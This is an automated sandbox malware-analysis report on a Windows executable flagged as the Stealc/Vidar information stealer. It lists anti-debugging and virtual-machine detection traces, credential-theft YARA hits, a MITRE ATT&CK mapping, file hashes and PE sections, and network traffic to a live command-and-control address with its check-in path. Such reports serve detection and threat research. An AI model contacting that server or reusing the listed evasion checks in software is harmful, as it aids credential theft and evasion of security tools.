                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C7BD second address: 83C7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C930 second address: 83C934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83C934 second address: 83C93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CAA9 second address: 83CABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C698AAEF0h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CABE second address: 83CAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CD57 second address: 83CD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CD5F second address: 83CD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847B4B second address: 847B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C698AAEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847FD9 second address: 847FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847FDD second address: 847FE7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C698AAEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848627 second address: 84863E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C6956DA51h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84863E second address: 848642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848642 second address: 848669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C6956DA58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F6C6956DA46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84895A second address: 84895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84895E second address: 848962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 848962 second address: 848983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C698AAEF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F6C698AAEE6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7CDE9D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7F4BBD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 631A8A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 8529BF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe TID: 7488 | Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7504 | Thread sleep time: -32016s >= -30000s
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_003E38B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003E4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_003DDA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_003DE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_003DED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_003E4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003DDE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_003DBE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003DF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_003E3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003D16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D1160 GetSystemInfo,ExitProcess | 0_2_003D1160
                Source: file.exe, file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2072556856.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2072556856.00000000010B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13698
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13643
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13646
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13663
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13658
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_003D45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003E9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9750 mov eax, dword ptr fs:[00000030h] | 0_2_003E9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003E7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003E9600
Source: file.exe, file.exe, 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: XaProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003E7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003E6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003E7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003E7A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1751441710.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (numbers in parentheses are the signature counts shown in the matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (34) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (34) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
http://185.215.113.37//Q | 17% | Virustotal | Browse
http://185.215.113.37/e2b1563c6670f193.php? | 21% | Virustotal | Browse
http://185.215.113.37/e2b1563c6670f193.phpC | 17% | Virustotal | Browse
http://185.215.113.37/e2b1563c6670f193.phpw | 17% | Virustotal | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37//Q | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2072556856.000000000106E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/(Q | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/6Q | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpC | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpw | file.exe, 00000000.00000002.2072556856.00000000010C7000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1532502
                    Start date and time:2024-10-13 13:58:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 3m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 79%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 90
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
Time | Type | Description
07:59:35 | API Interceptor | 7x Sleep call for process: file.exe modified
Match: 185.215.113.37
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                    No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.947733368951108
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'814'528 bytes
                    MD5:33f53a09cb02c7459d8723408c86ebbe
                    SHA1:db007d0f88f66d60e9740ac561ee622ed65fd936
                    SHA256:e0e099a250b184d85c84fff09038ae8efa95f967143811bb72032d36f5eb30c0
                    SHA512:84aac21d9248206be0a0d99a29c0ea63e644a9c5da8b4c6490c909b68a223ba4e088c9a28d399dae54ebdf0e9ef8854322ae30348a3d2a9eec95881ed289a383
                    SSDEEP:49152:WsexbnuH1zXIyved86pYoVc0Gfz+n3h/:KRnuVdmd8AjVc0GL+
                    TLSH:F38533B8AA650CDEF9D0A8BC1CD55A0F1F7412B432DF5A49AE4B3B2D482750E0C3B975
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0xa86000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | cb189a9b4adcb633de4285dce4a15366 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x292000 | 0x200 | e07f8870ce9dafa6d467e74d174635db | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
midxwoqt | 0x4f0000 | 0x195000 | 0x194c00 | 4537172a80d58683c2922bef2dea29d6 | False | 0.9945646666537986 | data | 7.953836715347976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dekzctjc | 0x685000 | 0x1000 | 0x600 | 19cd065333f1a7796ea77fc156bf4124 | False | 0.5559895833333334 | data | 4.874651785581111 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x686000 | 0x3000 | 0x2200 | 052eee5a5db1ed1a4de4881e39265fbe | False | 0.05767463235294118 | DOS executable (COM) | 0.7049367580891545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T13:59:37.994165+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 13:59:09.753259897 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:09.758985996 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 13:59:09.759083986 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:09.759407997 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 13:59:09.764636040 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 13:59:37.742793083 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
